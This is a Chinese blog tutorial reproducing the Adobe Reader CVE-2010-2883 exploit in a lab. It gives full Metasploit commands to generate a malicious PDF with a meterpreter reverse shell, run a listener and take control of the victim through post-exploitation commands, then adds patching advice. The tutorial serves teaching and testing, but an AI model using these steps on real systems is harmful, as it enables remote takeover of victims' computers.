[漏洞復現] CVE-2010-2883 Adobe Reader 打開pdf電腦即刻中招

1、漏洞概述

在「漏洞界」,據稱有兩種大山是其他軟體永遠無法匹敵的,一個是Microsoft的Office套件,一個是Adobe的全家桶。這兩家出的漏洞,無論在出洞頻率、攻擊危害性、或者是影響範圍等多個維度來看,都直接將其他軟體遠遠甩開。如果要較真起來,到底誰是「漏洞之王」?

相信Adobe一定能「摘得桂冠」。

Adobe全家桶裡面的Adobe Flash Player、Adobe Reader、Adobe Acrobat等產品,可以說是「難兄難弟」了,每年都會貢獻一大堆漏洞。很多人就會問,為什麼就他們家的產品漏洞最多,別人家的呢?

其實,所有軟體都或多或少有漏洞,沒有絕對安全的軟體,就看有沒有人去挖掘而已。

Adobe系列因為桌面安裝量非常龐大,而且官方似乎安全開發工作這塊做的不是太好,大量的黑客或安全研究人員願意投入更多的時間來「挖洞」,一個成熟可利用的Adobe 0day漏洞,價值連城毫不誇張。

這不,2018年2月份,Adobe Flash最新版就爆出CVE-2018-4878 高危漏洞,可導致電腦直接被getshell。而同一月份,思科旗下安全團隊TALOS披露了Adobe Reader最新版存在遠程代碼執行漏洞(CVE-2018-4901),簡單來說,「打開PDF文件可能導致被getshell」。目前,Adobe已經發布了針對此漏洞的安全補丁。

由於Adobe Reader CVE-2018-4901 暫時還沒有成熟可用的滲透代碼流傳出來,所以目前並沒有像Adobe Flash CVE-2018-4878 引起更廣泛的關注。

但是,我們要注意一點的是,此時此刻,必定有很多黑客正在嘗試寫攻擊代碼,準備發起新一輪攻擊。

雖然我們沒法直接對最新CVE-2018-4901進行復現,但從學習的角度,可以拿一個非常經典的老漏洞 CVE-2010-2883 來進行實踐。這枚漏洞年限已久,但可以直接做出「打開pdf即刻中招」的效果,可以說是「簡單暴力」的典範了。

CVE-2010-2883漏洞原理:「Adobe Reader在處理CoolType字體文件的sing表時,存在棧溢出漏洞,當打開特製的惡意PDF文件時,可允許任意代碼遠程執行。」

影響版本:Adobe Reader 8.2.4 - 9.3.4

目前,Kali Linux Metasploit已經集成了相關的漏洞利用代碼,我們可以用較快的速度,對此漏洞進行復現。

2、漏洞復現環境

Kali Linux + Windows 7 sp1

滲透機:Kali Linux (ip:172.16.70.216)

靶機:Windows 7 sp1 (ip:172.16.70.199)

軟體:Adobe Reader 9.3.exe

註:此實驗環境所用滲透機和靶機,跟之前文章所分享一致。為了節省大家實驗時間,我將此實驗涉及到的工具全部上傳到網盤=>

鏈接: pan.baidu.com/s/1585jID 密碼:ie8m

3、實驗流程

①進入Kali Linux,使用Metasploit生成PDF木馬文件

搜索Adobe滲透模塊 msf > search adobe_cooltype_sing 調用滲透模塊 msf > use exploit/windows/fileformat/adobe_cooltype_sing/ 查看模塊詳情 msf exploit(adobe_cooltype_sing) > info

調用meterpreter載荷,反向連接到滲透機 msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp 設置Kali Linux的IP地址 msf exploit(adobe_cooltype_sing) > set LHOST 172.16.70.216 設置本地監聽埠 msf exploit(adobe_cooltype_sing) > set LPORT 8888 設置帶有後門程序的PDF文件 msf exploit(adobe_cooltype_sing) > set FILENAME PINGINGLAB.pdf 執行滲透生成文件 msf exploit(adobe_cooltype_sing) > exploit

②將PDF木馬文件拷貝至Kali Linux桌面

root@kali:~# cp /root/.msf4/local/PINGINGLAB.pdf /root/Desktop/PINGINGLAB.pdf

③Metasploit開啟shell監聽會話,等待肉雞上線

使用handler監聽模塊 msf > use exploit/multi/handler 回彈一個tcp連接 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 設置監聽IP地址(跟PDF木馬文件一致) msf exploit(handler) > set LHOST 172.16.70.216 設置監聽的埠(跟PDF木馬文件一致) msf exploit(handler) > set LPORT 8888 開啟監聽 msf exploit(handler) > exploit

④在Windows 7安裝Adobe Reader 9.3

⑤將PDF木馬文件拷貝到Windows 7並打開

⑥Metasploit獲取shell會話,並用Meterpreter控制肉雞

查看系統信息 meterpreter > sysinfo 查看當前用戶 meterpreter > getuid 截屏 meterpreter > screenshot

獲取進程 meterpreter > ps 切換進程meterpreter > migrate 3748

註:考慮到這個漏洞利用過程,adobe reader會「卡殼」退出,所以需要快速切換到其他系統進程,這樣會話才不會丟失。

獲取Dos Shell meterpreter > shell C:Windowssystem32>ipconfig

實驗總結:

可以看到,最終由於Adobe Reader 存在CVE-2010-2883這個高危漏洞,導致電腦打開特殊定製的pdf之後,直接變成肉雞。與之前文章中的Office和Flash 0day漏洞類似,真實環境下,很多黑客會利用此方法,結合社會工程學,例如通過誘導郵件、各種論壇、QQ群、微信群等多渠道,誘導用戶下載並打開,而只要打開的用戶,就直接中招。

在這裡也呼籲大家:平常要非常小心陌生辦公文件,無論是pdf還是word等,打開之前一定要明確來源,或者用殺毒軟體先殺毒,再打開。另外,就是盡量保證電腦的軟體處於最新版,這樣才能最大程度降低被攻擊的幾率。

4、漏洞修復

①直接到Adobe官網,下載Adobe Reader最新版本;

②安裝常見殺毒軟體,開啟實時防護和殺毒引擎實時升級。


【了解更多】

知乎專欄:跟傑哥學網路與安全

新浪微博:@拼客學院陳鑫傑

微信公眾號:拼客院長陳鑫傑(搜索"pingsec"即可關注,大牛都在看)

拼客學院:pinginglab.net(專註網路|安全|運維的IT學院)

【相關文章】

網路安全入坑指南

[冇眼睇]揭秘地下色情誘導網站,上車吧!

拼客學院陳鑫傑:圖解ARP協議(三)ARP防禦篇-如何揪出"內鬼"並"優雅的還手"?

【視頻教程】

5天速成白帽子黑客

一周入門Linux運維

推薦閱讀:

[漏洞復現] CVE-2017-16995 Ubuntu16.04
網路安全 | 腳本小子學習攻略
《信息安全之細水長流》基礎三
[漏洞復現] CVE-2018-4878 Flash 0day

TAG:黑客Hacker | 滲透測試 | 信息安全 |